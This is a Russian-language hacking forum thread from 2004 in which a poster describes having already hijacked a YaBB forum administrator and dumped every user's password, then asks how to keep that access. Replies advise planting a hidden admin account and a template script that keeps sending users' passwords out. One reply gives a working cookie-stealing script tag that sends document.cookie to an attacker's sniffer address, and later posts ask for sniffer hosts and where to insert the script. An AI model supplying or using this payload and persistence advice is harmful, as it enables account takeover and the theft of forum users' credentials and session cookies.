Как сохранить административный доступ на форуме yabb?

Discussion in 'Песочница' started by Guest, 12 Jan 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    Народ помогите с сабжем!

    Один раз загнал админа YaBB форума на свою страничку с фреймами, в нулевом фрейме сделал себя админом, выдрал все пароли юзеров через YaBB.pl?board=;action=profile;username= (в т.ч. пароль админа).

    А теперь вопрос -  имея админский доступ к форуму можно ли его как-нить "затроянить"? т.к. "умные" пользователи имеют свойство время от времени менять свой пароль [​IMG] А каждый раз гнать админа на свою страничку как-то не хоцца...
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Создай новый аккаунт, дай ему админские права и сиди под ним.
    Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    А есть скрипт для отправки кукисов на мыло [​IMG]
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Не на мыло а на сниф:
    < script>
    var i=new Image;
    i.src='http://адрес снифа'+'?'+document.cookie;
    </script>
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Алгол, а какие снифферы есть? В смысле адреса...
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    На античате есть?
     
  7. igoreshka

    igoreshka New Member

    Joined:
    12 Jan 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Создай новый аккаунт, дай ему админские права и сиди под ним.
    Кроме того, если у тебя есть доступ к админке, то ты можешь запихнуть в какой-нибудь шаблон скриптик, который постоянно будет тебе слать пассворды юзеров (собственно это и будет настоящий троян)[/QUOTE]<span id='postcolor'>
    Сделать себя админом конечно привлекательно, НО
    1. Админ на форуме изначально всего один, а пользователей не так уж много.
    2. Статус админа сразу видно при просмотре списка юзеров да и при просмотре статистики форума выводится надпись типа - Администраторы:......

    За скриптик спасибо! Если б еще листинг снифа простенького написал кто-нить [​IMG]
     
  8. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
    Есть, но не для всеобщего пользования
     
  9. 11111118

    11111118 New Member

    Joined:
    10 Aug 2003
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ января 12 2004,23:12)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ января 12 2004,19:17)</td></tr><tr><td id="QUOTE">На античате есть?[/QUOTE]<span id='postcolor'>
    Есть, но не для всеобщего пользования[/QUOTE]<span id='postcolor'>
    скинь в личку плз, если не трудно....)))
     
  10. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Ага, так он тебе и скинет [​IMG]
     
  11. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    И еще... Скрипт можно всавлять только в теги? В хтмл сайта нельзя?
     
  12. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Сам-то понял че спросил ?
    Хтмл - это набор тегов.
     
  13. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Я просто пытался всавить непосредственно в хтмл без тегов... Он у меня вышел, как исходный текст.
     
Loading...
Similar Threads - сохранить административный доступ
  1. Torchin
    Replies:
    4
    Views:
    2,791